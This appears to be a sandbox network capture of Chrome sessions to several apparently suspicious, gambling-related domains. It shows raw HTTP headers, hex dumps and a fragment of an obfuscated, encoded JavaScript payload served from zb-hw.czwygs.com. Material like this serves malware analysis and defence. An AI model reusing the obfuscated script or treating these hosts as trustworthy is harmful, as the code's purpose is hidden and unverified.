                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQN%2B%2BxVN2SjrgAixaz4eQ7ga%2B0mYfYpJLT720JBND%2B4EADGNrBmzocniqk5Kg2sSRl7yYjEV3jfLdAS3PtM5QHEp%2FLge%2Fmb2ekJDtoPwD1oHQQAJ0jxFPbXbyBy8ueREcW2py9PbcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0e1aac06c49-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          541192.168.2.550313103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC375OUTGET /zb-cloud/pwv/sn.settings.get HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:20 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:20 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:20 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:20 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:20 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:20 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          542192.168.2.550312103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC376OUTGET /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Method
                                                                                                                                                          2024-06-09 22:41:20 UTC38INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Headers
                                                                                                                                                          2024-06-09 22:41:20 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:20 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:20 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:20 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:20 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 18


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          543192.168.2.550311103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC371OUTGET /mt-cloud/api/sn.maintain HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Method
                                                                                                                                                          2024-06-09 22:41:20 UTC38INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Headers
                                                                                                                                                          2024-06-09 22:41:20 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:20 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:20 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:20 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:20 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 18


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          544192.168.2.550321183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC632OUTGET /061410/rcenter/msites/themes/base.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC622INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-27
                                                                                                                                                          ETag: "655579ca-0"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:19 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-CHANGZ-MP-01-27
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-06
                                                                                                                                                          X-Cdn-Request-ID: 80bbf511bc99217c3bdb4a239b080cf8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          545192.168.2.550322113.16.211.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC393OUTGET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC635INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 6871
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-02-14
                                                                                                                                                          ETag: "5d848f4f-1ad7"
                                                                                                                                                          Date: Mon, 27 May 2024 07:28:58 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Wed, 26 Jun 2024 07:28:58 GMT
                                                                                                                                                          Age: 1177941
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: nnct015:443;huzmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-02-14
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-NN-CT-015-12
                                                                                                                                                          X-Cdn-Request-ID: 015c9b4a70f45732d77bee74e4cb5e46
                                                                                                                                                          2024-06-09 22:41:19 UTC6871INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Ducky</http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          546192.168.2.55026738.174.148.164434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC670OUTGET / HTTP/1.1
                                                                                                                                                          Host: 43370d.top
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:20 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 45 54 61 67 3a 20 22 36 34 37 65 65 30 64 62 2d 62 65 66 33 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "647ee0db-bef3"
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.2
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html
                                                                                                                                                          2024-06-09 22:41:20 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 30 36 20 4a 75 6e 20 32 30 32 33 20 30 37 3a 33 31 3a 33 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Tue, 06 Jun 2023 07:31:39 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:20 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:20 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                                                                                                                          Data Ascii: Accept-Ranges: bytes


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          547192.168.2.55032423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC573OUTGET /pc/240516-03/static/js/components/382/views/home/indexContent.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC630INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 16684
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:38 GMT
                                                                                                                                                          ETag: "6645cabe-412c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE21[4],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473790
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: af7b7ac05dc91d8c2db5ddd067b2a03a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118210
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15754INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 46 67 44 59 42 64 41 47 67 47 38 42 42 41 43 77 41 55 41 5a 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4e 50 53 49 41 4a 54 6b 41 76 71 51 42 4b 41 53 54 51 42 56 46 75 79 36 38 30 2f 51 61 54 51 69 41 62 6c 41 42 4f 41 41 6d 34 42 75 62 67 46 34 32 48 48 6e 78 45 36 51 6e 56 6a 72 52 37 7a 53 76 70 78 48 50 4c 6a 6b 4a 6d 34 6a 75 7a 54 44 52 73 62 6d 49 68 47 7a 73 48 50 53 43 51 67 44 6f 51 41 41 38 49 46 42 31 4f 4a 45 4e 74 66 53 67 54 61 4f 49 54 63 67 53 6b 6c 4b 52 47 4d 56 4a 75 41 42 4e 47 62 6c 49 41 47 78 51 6f 63 70 42 4b 67 45 49 41 52 6c 46 44 63 50 74 48 54 6d 44 69 47 4a 67 6f 47 70 72 4d 4b 44 6a 45 35 4e 54 53 4b 47
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAFgDYBdAGgG8BBACwAUAZALgDMBXNGAFwEt1NPSIAJTkAvqQBKASTQBVFuy680/QaTQiAblABOAAm4BubgF42HHnxE6QnVjrR7zSvpxHPLjkJm4juzTDRsbmIhGzsHPSCQgDoQAA8IFB1OJENtfSgTaOITcgSklKRGMVJuABNGblIAGxQocpBKgEIARlFDcPtHTmDiGJgoGprMKDjE5NTSKG
                                                                                                                                                          2024-06-09 22:41:20 UTC930INData Raw: 59 37 69 65 77 66 4a 76 58 64 75 2b 67 2f 51 65 66 59 45 30 6e 74 58 72 35 39 6b 2b 73 38 32 49 44 45 6a 4b 37 46 34 41 36 37 73 4e 50 59 58 75 37 32 62 78 77 39 6c 4b 55 58 6f 6b 35 4c 73 62 78 2f 66 61 66 68 76 37 77 62 46 72 4d 2f 5a 35 61 39 31 50 49 76 7a 6e 78 6b 4b 35 2f 63 39 4f 4a 41 76 4f 73 62 7a 38 35 37 38 38 52 65 75 45 36 69 59 4c 2b 67 47 63 39 68 66 2f 50 58 33 79 4c 2f 54 47 69 39 68 59 64 41 30 43 4f 4c 33 30 2f 55 58 56 36 6d 4c 57 5a 6f 57 79 6c 36 47 66 69 32 4d 76 31 51 43 32 31 4c 64 6d 51 79 32 35 62 43 4a 76 57 2f 6a 48 6c 6a 6e 37 67 72 64 65 69 66 56 67 52 4e 74 35 66 6d 33 42 58 35 37 30 56 2f 50 63 6c 66 64 6e 5a 58 2b 67 44 31 38 4f 63 63 59 52 76 69 72 71 37 34 5a 34 77 64 68 75 70 50 78 32 4c 69 2f 78 62 6e 76 54 50 62 76
                                                                                                                                                          Data Ascii: Y7iewfJvXdu+g/QefYE0ntXr59k+s82IDEjK7F4A67sNPYXu72bxw9lKUXok5Lsbx/fafhv7wbFrM/Z5a91PIvznxkK5/c9OJAvOsbz85788ReuE6iYL+gGc9hf/PX3yL/TGi9hYdA0COL30/UXV6mLWZoWyl6Gfi2Mv1QC21LdmQy25bCJvW/jHljn7grdeifVgRNt5fm3BX570V/PclfdnZX+gD18OccYRvirq74Z4wdhupPx2Li/xbnvTPbv


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          548192.168.2.550323183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC632OUTGET /061410/rcenter/common/themes/base.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
